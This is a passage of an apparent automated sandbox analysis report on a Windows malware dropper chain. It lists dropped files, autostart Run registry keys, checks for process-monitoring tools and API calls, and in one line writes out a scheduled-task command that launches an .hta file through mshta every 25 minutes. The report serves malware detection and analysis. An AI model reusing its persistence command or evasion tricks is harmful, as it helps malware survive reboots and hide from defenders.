                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_socket.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_ssl.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\zstandard\backend_c.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file

                                      Boot Survival

                                      barindex
                                      Creates multiple autostart registry keys
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8e933e9d51.exeJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmdJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d101bd5267.exeJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 718edcc992.exeJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0629403be8.exeJump to behavior
                                      Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeWindow searched: window name: FilemonClassJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeWindow searched: window name: RegmonClassJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeWindow searched: window name: FilemonClassJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonclassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonclassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeWindow searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeWindow searched: window name: RegmonClass
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeWindow searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeWindow searched: window name: Regmonclass
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeWindow searched: window name: Filemonclass
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeWindow searched: window name: Regmonclass
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXEWindow searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXEWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXEWindow searched: window name: RegmonClass
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXEWindow searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXEWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeWindow searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeWindow searched: window name: RegmonClass
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeWindow searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeWindow searched: window name: Regmonclass
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeWindow searched: window name: Filemonclass
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeWindow searched: window name: Regmonclass
                                      Uses schtasks.exe or at.exe to add and modify task schedules
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeFile created: C:\Windows\Tasks\rapes.jobJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8e933e9d51.exeJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8e933e9d51.exeJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmdJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmdJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0629403be8.exeJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0629403be8.exeJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d101bd5267.exeJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d101bd5267.exeJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 718edcc992.exeJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 718edcc992.exeJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0065F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,18_2_0065F98E
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006D1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,18_2_006D1C41
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_009690ED GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,13_2_009690ED
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
